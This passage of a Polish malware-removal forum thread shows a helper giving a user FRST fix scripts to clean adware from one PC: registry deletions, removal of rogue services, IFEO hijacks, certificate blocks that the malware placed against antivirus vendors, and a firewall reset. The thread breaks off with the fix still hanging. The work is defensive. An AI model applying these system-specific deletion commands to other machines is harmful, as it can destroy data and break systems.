hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}SearchScopes: HKU\S-1-5-21-1391594616-1957220202-1850595550-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}SearchScopes: HKU\S-1-5-21-1391594616-1957220202-1850595550-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: ) [brak podpisu cyfrowego] S2 CSHMDR; C:\Users\And\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 CWASRE; C:\Users\And\AppData\Local\CWASRE\Snare.dll [830464 2017-05-15] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [101016 2017-05-17] () S2 NPASRE; C:\Users\And\AppData\Local\NPASRE\Snare.dll [830464 2017-05-12] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 snare; C:\Users\And\AppData\Local\snare\Snare.dll [898048 2017-05-25] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 terana; C:\Users\And\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\sym\dbg.dll [109056 2017-05-12] (TODO: ) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\And\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-17] () [brak podpisu cyfrowego] C:\ProgramData\BITC:\Users\And\AppData\Local\CSHMDRC:\Users\And\AppData\Local\CWASREC:\Users\And\AppData\Local\NPASREC:\Users\And\AppData\Local\snareC:\Users\And\AppData\Local\teranaC:\ProgramData\Microsoft\AppV\sym\dbg.dllC:\Users\And\AppData\Roaming\WinSAPSvc 2017-05-24 11:08 - 2017-05-31 13:27 - 00001987 _____ C:\Users\And\Desktop\big_bang_empire.lnk 2017-05-24 11:08 - 2017-05-31 13:27 - 00001961 _____ C:\Users\And\Desktop\BigFarm.lnk 2017-05-09 12:16 - 2017-05-09 12:16 - 0016176 _____ () C:\Users\And\AppData\Local\InstallationConfiguration.xml2017-05-09 12:16 - 2017-05-09 12:16 - 0140800 _____ () C:\Users\And\AppData\Local\installer.dat2017-05-09 12:17 - 2017-05-09 12:17 - 0278509 _____ () C:\Users\And\AppData\Local\Ranrantouch.binC:\Windows\Temp\gBAC6.tmp.exeC:\Users\And\zijkxhq.exeDeleteKey: HKCU\Software\HotleafDeleteKey: HKLM\SOFTWARE\WOW6432Node\HotleafDeleteKey: HKCU\Software\FirefoxDeleteKey: HKLM\SOFTWARE\WOW6432Node\FirefoxDeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\MainDeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\MainDeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\MainDeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopesDeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopesDeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopesCMD: dir /a "C:\Program Files"CMD: dir /a "C:\Program Files (x86)"CMD: dir /a "C:\Program Files\Common Files\System"CMD: dir /a "C:\Program Files (x86)\Common Files\System"CMD: dir /a C:\ProgramDataCMD: dir /a C:\Users\And\AppData\LocalCMD: dir /a C:\Users\And\AppData\LocalLowCMD: dir /a C:\Users\And\AppData\RoamingCMD: netsh advfirewall resetHosts:EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 3. Kompleksowo wymień profile w przeglądarce Google Chrome oraz Mozilla FireFox. Otwórz Google Chrome następnie: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > Załóż czysty profil > ponownie wejdź do sekcji Osoby i skasuj wszystkie stare profile. Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p lub "C:\Program Files\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. Utracisz wszystko z tych przeglądarek, więc ewentualnie możesz wyeksportować zakładki i ważne linki.Ważne, abyś którąś z powyższych przeglądarek ustawił jako domyślną - inaczej nie cofnie się modyfikacja infekcji. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). hotleaf;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
Alopus Opublikowano 19 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 19 Czerwca 2017 Wklejam pliki. Różnice - skrypt napraw usunął ff, instalowałem ponownie. AlphaGo - usunąłem 5x. Addition.txt Shortcut.txt FRST.txt SearchReg_hotleaf.txt Fixlog_po naprawie.txt Odnośnik do komentarza
Miszel03 Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 (edytowane) FireFox wcale nie został usunięty, tylko Ci się tak wydaję, bo dotychczasowo przez infekcję systemu korzystałeś z podróbki. Oryginalna wersja była usilnie zamaskowana przez adware. Deinstalacja nie rusza profili, więc musisz powtórzyć działanie z profilem ponownie (patrz pkt. 2 w tym poście). Reszta pomyślnie wykonana, teraz musimy dobić i pominięte przeze mnie elementy za pierwszym razem. Niektóre elementy usuną się ponownie, bo wcześniej popełniłeś literówkę i nie wykonało się to tj. powinno. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses:CreateRestorePoint:HKLM\...\RunOnce: [AND-KOMPUTER] => C:\Windows\TEMP\gC36D.tmp.exe [239104 2017-06-19] () HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] R2 swpvr; C:\ProgramData\Microsoft\Software\Shadow\Provider.dll [122880 2017-05-17] (TODO: ) [brak podpisu cyfrowego]C:\ProgramData\Microsoft\SoftwareIFEO\GoogleUpdate.exe: [Debugger] 324095823984.exeIFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exeMSCONFIG\startupfolder: C:^Users^And^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^x.vbs => C:\Windows\pss\x.vbs.StartupMSCONFIG\startupfolder: C:^Users^And^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^z.vbs => C:\Windows\pss\z.vbs.Startup2017-06-01 09:12 - 2017-06-01 09:12 - 00000000 ____D C:\Users\Public\Documents\chrome2017-06-19 11:39 - 2017-05-12 12:26 - 00000000 _____ C:\Users\Public\Documents\report.dat2017-06-19 11:20 - 2017-05-12 12:26 - 00006566 _____ C:\Users\Public\Documents\temp.dat2017-06-02 13:08 - 2017-05-17 10:48 - 00000000 ____D C:\Users\And\AppData\Roaming\WinSAPSvc2017-05-24 11:08 - 2017-05-12 12:26 - 00000000 _____ C:\Windows\SysWOW64\1111FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExtFF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtensionFF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\And\AppData\Roaming\Mozilla\Firefox\Profiles\e3mbqcik.default-1494836737585\extensions\arthurj8283@gmail.comC:\Users\And\Desktop\Avira PC Cleaner.lnkC:\Users\And\Desktop\Remove Avira PC Cleaner.lnkDeleteKey: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\b8ade3e_0DeleteValue: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Firefox\Firefox.exe=FirefoxDeleteValue: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Classes\FirefoxURL\shell\open\command|C:\Program Files (x86)\Firefox\Firefox.exe -osint -url %1DeleteValue: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Classes\FirefoxURL\DefaultIcon|C:\Program Files (x86)\Firefox\Firefox.exe,1DeleteValue: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Mozilla\Firefox\OldDefaultBrowserCommand|C:\Program Files (x86)\Firefox\Firefox.exe -osint -url %1DeleteValue: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe=1DeleteKey: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\651b31f_0DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Firefox\InstallInfo|ShowIconsCommand=C:\Program Files (x86)\Firefox\Firefox.exe -ShowIconsCommandDeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Firefox\InstallInfo|ReinstallCommand=C:\Program Files (x86)\Firefox\Firefox.exe -ReinstallCommandDeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Firefox\InstallInfo|HideIconsCommand=C:\Program Files (x86)\Firefox\Firefox.exe -HideIconsCommandDeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Firefox\DefaultIcon|C:\Program Files (x86)\Firefox\Firefox.exe,0DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Firefox\Capabilities|ApplicationIcon=C:\Program Files (x86)\Firefox\Firefox.exe,0EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.2. Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p lub "C:\Program Files\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. 3. Usunąłem diagnostykę, bo picasso właśnie zawiadomiła mi, że inny user podesłał jej plik.W związku z przeprowadzeniem analizy wirusa przez picasso, zalecana jest kompleksowa reinstalacja przeglądarki, by usuną tą modyfikację. Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Edytowane 25 Czerwca 2017 przez Rucek Odnośnik do komentarza
Alopus Opublikowano 21 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Niestety FRST po restarcie się zwiesił, proces wygląda na nieaktywny, co robić? Odnośnik do komentarza
Miszel03 Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Ale wypluł Fixlog? Jeśli nie to uruchom system ponownie i użyj skryptu jeszcze raz. Odnośnik do komentarza
Alopus Opublikowano 22 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 22 Czerwca 2017 Jest fixlog, powstał kilka minut po puszczeniu programu, wygląda na to, że przed restartem, ale pewności nie mam - wklejam + pozostałe pliki. FRST.txt Addition.txt Shortcut.txt Fixlog.txt Odnośnik do komentarza
Miszel03 Opublikowano 24 Czerwca 2017 Zgłoś Udostępnij Opublikowano 24 Czerwca 2017 Fix ucięty, a w raportach brak zmian. Powtórz Fix (tym razem z poziomu Trybu awaryjnego) i zrób nowy zestaw raportów. Odnośnik do komentarza
Alopus Opublikowano 28 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 28 Czerwca 2017 Niestety, próbowałem wczoraj i dzisiaj, w trybie serwisowym i normalnym - zwis za każdym razem, czekałem raz nawet ze 2 godziny. Proces nieaktywny. Odnośnik do komentarza
Alopus Opublikowano 6 Lipca 2017 Autor Zgłoś Udostępnij Opublikowano 6 Lipca 2017 puk puk, co robić?? Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się